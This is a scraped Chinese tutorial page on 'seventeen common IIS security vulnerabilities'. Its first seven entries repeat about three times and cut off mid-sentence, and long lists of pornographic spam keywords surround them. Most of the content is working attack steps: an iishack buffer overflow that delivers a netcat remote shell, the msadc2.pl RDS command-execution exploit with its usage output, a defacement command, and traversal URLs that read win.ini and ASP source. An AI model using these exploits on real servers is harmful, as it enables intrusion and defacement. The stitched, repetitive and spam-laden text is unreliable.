欧美三区四区_av先锋影音资源站_亚洲第一论坛sis_影音先锋2020色资源网_亚洲精品社区_在线免费观看av网站_国产一区二区伦理_亚洲欧美视频一区二区_99视频精品全部免费在线_精精国产xxxx视频在线

IIS的十七個(gè)常見(jiàn)安全漏洞_Web服務(wù)器教程

編輯Tag賺U幣
教程Tag:暫無(wú)Tag,歡迎添加,賺取U幣!

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對(duì)關(guān)于這些文件的URL請(qǐng)求沒(méi)有對(duì)名字進(jìn)行充分的邊界檢查,導(dǎo)致運(yùn)行攻擊者插入一些后門(mén)程序 在系統(tǒng)中下載和執(zhí)行程序。要檢測(cè)這樣的站點(diǎn)你需要兩個(gè)文件iishack.exe,ncx.exe,你可以到下面 的站點(diǎn)www.technotronic.com去下載,另外你還需要一臺(tái)自己的WEB服務(wù)器。你現(xiàn)在你自己的Web服務(wù)器上運(yùn)行WEB服務(wù)程序并把ncx.exe放到你自己相應(yīng)的目錄下,然后使用iishack.exe來(lái)檢查目標(biāo)機(jī)器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來(lái)連接你要檢測(cè)的服務(wù)器:

c:>nc 80

如果溢出點(diǎn)正確你就可以看到目標(biāo)機(jī)器的命令行提示,并且是管理遠(yuǎn)權(quán)限。利用程序見(jiàn)iis4hack.zip

2.msadc

IIS的MDAC組件存在一個(gè)漏洞可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行你系統(tǒng)的命令。主要核心問(wèn)題是存在于RDS Datafactory,默認(rèn)情況下, 它允許遠(yuǎn)程命令發(fā)送到IIS服務(wù)器中,這命令會(huì)以設(shè)備用戶(hù)的身份運(yùn)行,其一般默認(rèn)情況下是SYSTEM用戶(hù)。利用程序?yàn)閙sadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現(xiàn)cmd /c后,直接鍵入命令行,就可以以system權(quán)限執(zhí)行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個(gè)WEB用戶(hù)在文檔上highlighted(突出)他們?cè)妓阉鞯臈l目,這個(gè)文檔的名字通過(guò)變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個(gè)ISAPI應(yīng)用程序 來(lái)處理請(qǐng)求,打開(kāi)文件并返回結(jié)果,當(dāng)用戶(hù)控制了CiWebhitsfile參數(shù)傳遞給.htw時(shí),他們就可以請(qǐng)求任意文件,結(jié)果就是導(dǎo)致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個(gè)漏洞,你可以請(qǐng)求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務(wù)器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個(gè)漏洞 .這個(gè)問(wèn)題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射,所以你只要取消

這個(gè)映射就能避免這個(gè)漏洞,你可以在你認(rèn)為有漏洞的系統(tǒng)中搜索.htw文件,一般會(huì)發(fā)現(xiàn)如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個(gè)一般為loopback使用)

一個(gè)攻擊者可以使用如下的方法來(lái)訪問(wèn)系統(tǒng)中文件的內(nèi)容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會(huì)在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內(nèi)容,你可以請(qǐng)求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對(duì)關(guān)于這些文件的URL請(qǐng)求沒(méi)有對(duì)名字進(jìn)行充分的邊界檢查,導(dǎo)致運(yùn)行攻擊者插入一些后門(mén)程序 在系統(tǒng)中下載和執(zhí)行程序。要檢測(cè)這樣的站點(diǎn)你需要兩個(gè)文件iishack.exe,ncx.exe,你可以到下面 的站點(diǎn)www.technotronic.com去下載,另外你還需要一臺(tái)自己的WEB服務(wù)器。你現(xiàn)在你自己的Web服務(wù)器上運(yùn)行WEB服務(wù)程序并把ncx.exe放到你自己相應(yīng)的目錄下,然后使用iishack.exe來(lái)檢查目標(biāo)機(jī)器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來(lái)連接你要檢測(cè)的服務(wù)器:

c:>nc 80

如果溢出點(diǎn)正確你就可以看到目標(biāo)機(jī)器的命令行提示,并且是管理遠(yuǎn)權(quán)限。利用程序見(jiàn)iis4hack.zip

2.msadc

IIS的MDAC組件存在一個(gè)漏洞可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行你系統(tǒng)的命令。主要核心問(wèn)題是存在于RDS Datafactory,默認(rèn)情況下, 它允許遠(yuǎn)程命令發(fā)送到IIS服務(wù)器中,這命令會(huì)以設(shè)備用戶(hù)的身份運(yùn)行,其一般默認(rèn)情況下是SYSTEM用戶(hù)。利用程序?yàn)閙sadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現(xiàn)cmd /c后,直接鍵入命令行,就可以以system權(quán)限執(zhí)行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個(gè)WEB用戶(hù)在文檔上highlighted(突出)他們?cè)妓阉鞯臈l目,這個(gè)文檔的名字通過(guò)變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個(gè)ISAPI應(yīng)用程序 來(lái)處理請(qǐng)求,打開(kāi)文件并返回結(jié)果,當(dāng)用戶(hù)控制了CiWebhitsfile參數(shù)傳遞給.htw時(shí),他們就可以請(qǐng)求任意文件,結(jié)果就是導(dǎo)致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個(gè)漏洞,你可以請(qǐng)求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務(wù)器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個(gè)漏洞 .這個(gè)問(wèn)題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射,所以你只要取消

這個(gè)映射就能避免這個(gè)漏洞,你可以在你認(rèn)為有漏洞的系統(tǒng)中搜索.htw文件,一般會(huì)發(fā)現(xiàn)如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個(gè)一般為loopback使用)

一個(gè)攻擊者可以使用如下的方法來(lái)訪問(wèn)系統(tǒng)中文件的內(nèi)容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會(huì)在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內(nèi)容,你可以請(qǐng)求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對(duì)關(guān)于這些文件的URL請(qǐng)求沒(méi)有對(duì)名字進(jìn)行充分的邊界檢查,導(dǎo)致運(yùn)行攻擊者插入一些后門(mén)程序 在系統(tǒng)中下載和執(zhí)行程序。要檢測(cè)這樣的站點(diǎn)你需要兩個(gè)文件iishack.exe,ncx.exe,你可以到下面 的站點(diǎn)www.technotronic.com去下載,另外你還需要一臺(tái)自己的WEB服務(wù)器。你現(xiàn)在你自己的Web服務(wù)器上運(yùn)行WEB服務(wù)程序并把ncx.exe放到你自己相應(yīng)的目錄下,然后使用iishack.exe來(lái)檢查目標(biāo)機(jī)器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來(lái)連接你要檢測(cè)的服務(wù)器:

c:>nc 80

如果溢出點(diǎn)正確你就可以看到目標(biāo)機(jī)器的命令行提示,并且是管理遠(yuǎn)權(quán)限。利用程序見(jiàn)iis4hack.zip

2.msadc

IIS的MDAC組件存在一個(gè)漏洞可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行你系統(tǒng)的命令。主要核心問(wèn)題是存在于RDS Datafactory,默認(rèn)情況下, 它允許遠(yuǎn)程命令發(fā)送到IIS服務(wù)器中,這命令會(huì)以設(shè)備用戶(hù)的身份運(yùn)行,其一般默認(rèn)情況下是SYSTEM用戶(hù)。利用程序?yàn)閙sadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現(xiàn)cmd /c后,直接鍵入命令行,就可以以system權(quán)限執(zhí)行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個(gè)WEB用戶(hù)在文檔上highlighted(突出)他們?cè)妓阉鞯臈l目,這個(gè)文檔的名字通過(guò)變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個(gè)ISAPI應(yīng)用程序 來(lái)處理請(qǐng)求,打開(kāi)文件并返回結(jié)果,當(dāng)用戶(hù)控制了CiWebhitsfile參數(shù)傳遞給.htw時(shí),他們就可以請(qǐng)求任意文件,結(jié)果就是導(dǎo)致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個(gè)漏洞,你可以請(qǐng)求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務(wù)器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個(gè)漏洞 .這個(gè)問(wèn)題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射,所以你只要取消

這個(gè)映射就能避免這個(gè)漏洞,你可以在你認(rèn)為有漏洞的系統(tǒng)中搜索.htw文件,一般會(huì)發(fā)現(xiàn)如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個(gè)一般為loopback使用)

一個(gè)攻擊者可以使用如下的方法來(lái)訪問(wèn)系統(tǒng)中文件的內(nèi)容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會(huì)在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內(nèi)容

來(lái)源:網(wǎng)絡(luò)搜集//所屬分類(lèi):Web服務(wù)器教程/更新時(shí)間:2012-07-24
相關(guān)Web服務(wù)器教程
天堂蜜桃91精品| 99热这里只有精品99| 亚洲精品中文字幕99999| 91免费在线视频观看| 亚洲欧洲在线播放| 亚洲欧洲国产日韩精品| 国产精品免费人成网站酒店| av日韩在线播放| 国产无一区二区| 超碰97人人做人人爱少妇| 国产欧美精品aaaaaa片| 国产成人综合欧美精品久久| 日韩伦理一区| 亚洲午夜国产一区99re久久| 欧美有码在线观看| 久久久久xxxx| xx欧美视频| 国产成人午夜精品5599| 亚洲美女又黄又爽在线观看| 伊人精品久久久久7777| 中国一级特黄毛片| 女同性一区二区三区人了人一| 欧美日韩国产麻豆| 91网在线免费观看| 亚洲精品午夜视频| 国产成人一二片| 国产精品久久久久久久久免费丝袜| 欧美高清激情视频| 天天干天天干天天干天天干天天干| 一区二区在线中文字幕电影视频| 精品国产综合| 精品无码国产污污污免费网站| 欧美影院视频| 国产精品美女久久久久久久网站| 国模叶桐国产精品一区| 99热一区二区| 亚洲精品.com| 久久婷婷成人综合色| 欧美另类在线观看| 在线播放av中文字幕| 欧美艳星kaydenkross| 粉嫩13p一区二区三区| 自拍偷拍亚洲在线| 超碰影院在线观看| 五月婷婷六月激情| 成人午夜电影网站| 欧美精品制服第一页| 欧美大尺度做爰床戏| 成人免费网站www网站高清| 成人性视频网站| 欧美精品午夜视频| 日韩欧美亚洲另类| 亚洲美女色播| 亚洲天堂免费看| 国产一区二区在线免费视频| 中文字幕有码在线播放| 精品国产一区二区三区久久久樱花 | 日韩av中文字幕在线播放| 国产精品一二三在线观看| 亚洲无码精品在线播放| 理论电影国产精品| 色吧影院999| 奇米影音第四色| 色综合久久久| 亚洲人成亚洲人成在线观看图片| 成人春色激情网| 国产尤物在线播放| 欧美国产激情| 欧美电视剧在线看免费| 国产情侣第一页| 成人无码一区二区三区| 成人av免费观看| 91国语精品自产拍在线观看性色| 欧美肉大捧一进一出免费视频| aaaaaa毛片| 日韩三级小视频| 99久久夜色精品国产亚洲96 | 欧美极品美女视频网站在线观看免费| 久久久久久久久久毛片| 2021年精品国产福利在线| 亚洲成av人片在线| 蜜桃网站成人| 日本欧美www| 国产一区亚洲一区| 欧美国产视频一区二区| 亚洲天堂资源在线| 成人3d动漫在线观看| 91精品黄色片免费大全| 日韩a级在线观看| 成人激情综合| 亚洲乱码国产乱码精品精可以看| 国产精品福利视频| www亚洲视频| 精品一区二区三区影院在线午夜| 欧美成人午夜激情视频| 亚洲观看黄色网| 亚洲mv大片欧洲mv大片| 色婷婷综合久久久久中文一区二区 | 欧美视频国产精品| 亚洲一区二区三区精品视频| www.日韩高清| 国产亚洲女人久久久久毛片| 国产一区私人高清影院| 国产精品久久久久久久电影| 欧美一区二区三区成人久久片| 天堂免费在线视频| 国产成人精品影视| 国产成人高清激情视频在线观看| 日韩成人短视频| 亚洲欧美不卡| 美日韩丰满少妇在线观看| 波多野结衣视频播放| 久久社区一区| 亚洲精品网站在线播放gif| 一区二区久久精品| 真实原创一区二区影院| 日韩三级高清在线| 我看黄色一级片| 香蕉久久夜色精品国产更新时间| 欧美夫妻性生活| 精品视频无码一区二区三区| 91综合久久爱com| 欧美体内she精视频| 成人性生活视频免费看| 日韩三区四区| 欧美亚洲动漫制服丝袜| 黄色www网站| 一区二区网站| 91精品国产91久久久久久最新毛片| 日本熟妇人妻xxxxx| 成人台湾亚洲精品一区二区| 欧美高清视频一二三区 | 亚洲一级免费视频| 国产草草浮力影院| 狠狠88综合久久久久综合网| 久久精品久久久久| 任你操精品视频| 日韩电影在线一区二区三区| 欧美孕妇与黑人孕交| 久久婷婷一区二区| 国产高清亚洲一区| 91精品视频网站| 亚洲网站免费观看| 欧美韩国日本综合| 欧美日韩最好看的视频| 自拍网站在线观看| 精品久久久久久久久久| 隔壁人妻偷人bd中字| 免费看日产一区二区三区| 欧美日韩国产电影| 中文字幕 91| 久久国产电影| 中文字幕精品在线视频| 国产黄色录像视频| 蜜桃传媒麻豆第一区在线观看| 国产精品91在线观看| 黄色一级视频免费看| 久久免费视频色| 日韩videos| 精品176极品一区| 欧美老女人第四色| 中文字幕12页| 好吊视频一区二区三区四区| 欧美极品在线播放| 黄色小视频在线免费看| 国产69精品久久777的优势| 91成人免费观看| 人妻少妇精品无码专区久久| 精品久久久久久中文字幕| 国产精品50p| 成人精品影院| 久久午夜a级毛片| 精品处破女学生| 91亚洲精华国产精华精华液| 欧美日韩一区二| **精品中文字幕一区二区三区| 欧美精品一二三| 国产精品成人免费一区久久羞羞| 亚洲精品系列| 国产精品观看在线亚洲人成网| 波多野结衣电车痴汉| 亚洲视频狠狠干| 黄色一级片黄色| 国产成人黄色| 久久九九免费视频| 日韩污视频在线观看| 久久美女艺术照精彩视频福利播放| 三区精品视频观看| 亚洲天堂av资源在线观看| 亚洲精品电影在线观看| 日本污视频网站| 成人免费黄色大片| 色一情一乱一伦一区二区三区| 久久国产精品美女| 亚洲免费视频在线观看| √天堂中文官网8在线| 成人av在线一区二区三区| 日本精品一区二区三区视频| 激情五月综合婷婷| 亚洲欧美另类在线观看| 亚洲精品卡一卡二| 91日韩一区二区三区| 在线观看成人av电影| 精品少妇一区| 精品国内亚洲在观看18黄| 日本中文字幕在线免费观看| 中文字幕一区三区| 日韩精品―中文字幕| 亚洲国产一成人久久精品| 欧美亚洲日本网站| 国产精品无码在线播放| 色婷婷av久久久久久久| 不卡的一区二区| 久久精品国产网站| 欧美精品在线一区| 国产精品久久久久久久av电影| 成年人视频免费| 亚洲一区二区黄色| 亚洲 激情 在线| 国产农村妇女毛片精品久久莱园子| 91沈先生作品| 国产电影一区二区三区爱妃记| 精品久久一区二区| 国产黄色录像片| 国产日本一区二区| 人人妻人人添人人爽欧美一区| 午夜国产欧美理论在线播放| 国产精品美女久久久免费| 五月婷婷六月激情| 亚洲国产精品久久久| www.超碰在线观看| 一区视频在线播放| 浓精h攵女乱爱av| 日韩黄色在线观看| 欧美一区二区三区四区夜夜大片| 精品久久ai| 欧美激情奇米色| 国产xxxx在线观看| 91精品国产综合久久久久久久 | 69堂免费精品视频在线播放| 精品中文字幕久久久久久| 久久精品国产亚洲av香蕉| 一区二区三区在线视频观看58| 亚洲人视频在线| 九九精品视频在线看| 婷婷四房综合激情五月| 成人网18免费网站| 国产精品免费看久久久香蕉| 91国内外精品自在线播放| 国产亚洲欧美一区| 中文在线观看免费高清| 在线日韩一区二区| 91社区视频在线观看| 欧美国产日韩亚洲一区| 9久久婷婷国产综合精品性色| 日韩专区在线视频| 先锋影音亚洲资源| 亚洲91精品| 高清国产在线一区| 丁香5月婷婷久久| 97人人爽人人喊人人模波多 | 国产欧美日韩一区| 欧美天堂社区| 日韩av不卡电影| 福利一区视频| 久久中文精品视频| 亚洲国产精品无码久久| 亚洲国产中文字幕久久网| 国产精品suv一区二区三区| 欧美午夜性色大片在线观看| 久久久无码人妻精品一区| 欧美激情一区不卡| 超碰人人草人人| 国产99久久久国产精品 | 久久99久久久欧美国产| 青春草在线视频免费观看| 欧美三级网页| 麻豆蜜桃91| 日韩.com| 成人自拍偷拍| 禁断一区二区三区在线| 91精品久久久久久久久久另类| 亚洲三级av| 日韩美女主播视频| 国产一区二区三区亚洲综合| 97精品在线视频| 巨大黑人极品videos精品| 免费不卡在线观看av| 原纱央莉成人av片| 久久色在线播放| 成人动漫一区| 久久国产精品久久国产精品| 视频一区 中文字幕| 国产亚洲欧洲在线| 国产高清视频免费观看| 亚洲欧美日韩一区二区三区在线| 一级久久久久久久| 亚洲毛片在线免费观看| 国产又粗又猛又爽又黄的视频一| 日韩av影视综合网| 91成人一区二区三区| 日韩精品在线私人| 国产精品一区二区黑人巨大 | 国产精品你懂的在线| av漫画在线观看| 国产精品人成在线观看免费 | 欧美日韩一区在线播放| 欧美久久九九| 亚洲精品久久区二区三区蜜桃臀 | 国产精品丝袜白浆摸在线| www.爱久久| 国产欧美va欧美va香蕉在线| 日韩黄色网络| 成人18视频| 欧美激情成人| 日韩av一区二区三区在线观看| 亚洲国产精品第一区二区| 三年中文高清在线观看第6集| 校园激情久久| 日韩a∨精品日韩在线观看| 国产精品1区2区| www.se五月| 中文字幕巨乱亚洲| 国产精品无码久久久久久| 亚洲va国产天堂va久久en| 日韩精品一区二区亚洲av性色| 精品视频资源站| 久久久久在线视频| 亚洲黄色在线观看| 性少妇videosexfreexxx片| 日韩视频亚洲视频| 草民电影神马电影一区二区| 欧美亚洲伦理www| 婷婷精品在线观看| 国产欧美一区二区在线播放| 欧美精品啪啪| 久久久天堂国产精品| 韩国午夜理伦三级不卡影院| 无码人妻精品一区二区三区66| 91麻豆精品一区二区三区| 激情av中文字幕| 亚洲第一搞黄网站| 精品无码久久久久久久久| 欧美一区二区三区四区久久| 一级黄色大毛片| www.欧美精品一二三区| 成人永久在线| 成人精品福利视频| 久久久久免费av| av中文字幕av| 成人亚洲精品久久久久软件| 亚洲av午夜精品一区二区三区| 一区二区理论电影在线观看| 亚洲av无码一区二区三区在线| 欧美一区二区福利视频| 亚洲大尺度网站| 国产69精品久久久久9| 国产精品一区二区三区美女| 激情五月综合色婷婷一区二区 | 中文字幕乱码在线| 五月婷婷久久丁香| 91丝袜一区二区三区| 亚洲一二在线观看| 97久久精品一区二区三区的观看方式 | 一级黄色在线观看| 日韩在线免费av| 国产欧美日韩电影| 懂色一区二区三区av片| 亚洲黄网站黄| 日本在线视频www| 中文字幕亚洲成人| 久久久国产精品人人片| 亚洲韩国欧洲国产日产av| 日韩成人亚洲| 91在线视频导航| 亚洲精品黄色| 手机看片福利盒子久久| 综合久久国产九一剧情麻豆| 麻豆一区二区三区精品视频| 亚洲精品日韩欧美| 亚洲精品一区二区在线播放∴| 99在线观看| 久久综合狠狠| 免费观看黄网站| 日韩欧美亚洲国产一区| 亚洲综合精品视频| 久久人91精品久久久久久不卡| 国产剧情在线观看一区| 色一情一区二区三区四区| 粉嫩一区二区三区在线看| 丰满少妇高潮一区二区| 欧美一区二区三区播放老司机| 无码国产色欲xxxx视频| 国产原创欧美精品| 亚洲色诱最新| 亚洲av无日韩毛片久久| 一区二区三区四区在线| 国产精华7777777| 97视频在线看| 欧美一区综合|